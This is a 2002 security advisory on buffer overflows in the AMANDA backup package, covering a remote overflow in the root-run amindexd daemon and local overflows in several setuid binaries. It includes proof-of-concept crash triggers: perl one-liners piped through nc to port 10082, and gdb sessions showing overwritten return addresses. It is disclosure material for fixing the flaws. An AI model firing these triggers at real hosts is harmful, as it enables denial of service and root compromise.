AMANDA security issues

[zillion <zillion () snosoft com>]

==================================================================
                    Security advisory: AMANDA
==================================================================

Package:  AMANDA
Version:  2.3.0.4
Date:     26/05/2002
Issue:    Local and remote overflows
Risk:     Medium since this is an old package
Credits:  zillion[at]safemode.org
          http://www.safemode.org
          http://www.snosoft.com

The Advanced Maryland Automatic Network Disk Archiver (AMANDA) is
a backup system which is available for many different Unix-based
operating systems. Several setuid and setgid binaries which are
installed by this package contain buffer overflow vulnerabilities
that can be used to execute shellcode with elevated privileges.
Additionally, the amindexd daemon contains a remote overflow bug
that can lead to a remote system compromise.

The affected version of AMANDA is an old package but is often used
due to compatibility problems with newer versions. For example,
this package was until recently shipped with the FreeBSD 4.5 ports
collection.


Fix information:
==================================================================

Upgrade AMANDA to the latest stable version , which is available
from the developers web site: http://www.amanda.org

As noted earlier, this affects the FreeBSD ports collection that
is shipped with 4.5 or earlier. FreeBSD was contacted and has removed
the vulnerable AMANDA port.

Thanks AMANDA developers and FreeBSD for the fast reaction on this
issue.


Technical details:
==================================================================

The local overflows are all found in files that can only be executed by
those that are member of the operator group. This is a big limitation
to anyone that is trying to abuse amanda locally as normal users are
not member of this group.  The big risk here is the amindexd daemon
(10082/TCP) that runs as root and contains several overflows of which
two can be triggered without any knowledge of the affect systems
configuration.


The amindexd daemon (remote, runs as root)
-------------------------------------------

Long commands send to this server will result in an immediate
overflow This does not require any knowledge of the affect systems
configuration.  Simple replication of this overflow:

perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082
perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082

The below listed file are only accessible by users that are member
of the group 'operator'. This is a big limitation for anyone that will
try to abuse them ;).


The amcheck file (setuid root)
-------------------------------------------

bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'`
Segmentation fault (core dumped)

(gdb) bt
#0  0x2814c022 in ?? ()
#1  0x280f8c0a in ?? ()
#2  0x804d671 in ?? ()
#3  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)


The amgetidx file (setuid operator)
-------------------------------------------

(gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28144022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0  0x28144022 in vfprintf () from /usr/lib/libc.so.4
#1  0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
#2  0x804c8dd in getsockname ()
#3  0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)


The amtrmidx file  (setuid operator)
-------------------------------------------

bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28141022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0  0x28141022 in vfprintf () from /usr/lib/libc.so.4
#1  0x280edc0a in vsprintf () from /usr/lib/libc.so.4
#2  0x804b291 in free ()
#3  0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-dump file (setuid operator)
-------------------------------------------

sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0  0x2814398c in getenv () from /usr/lib/libc.so.4
#1  0x28142801 in isatty () from /usr/lib/libc.so.4
#2  0x2814362e in malloc () from /usr/lib/libc.so.4
#3  0x280fbec2 in popen () from /usr/lib/libc.so.4
#4  0x8048874 in atoi ()
#5  0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)


The createindex-gnutar file (setuid operator)
----------------------------------------------

bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0  0x2814398c in getenv () from /usr/lib/libc.so.4
#1  0x28142801 in isatty () from /usr/lib/libc.so.4
#2  0x2814362e in malloc () from /usr/lib/libc.so.4
#3  0x280fbec2 in popen () from /usr/lib/libc.so.4
#4  0x8048811 in atoi ()
#5  0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)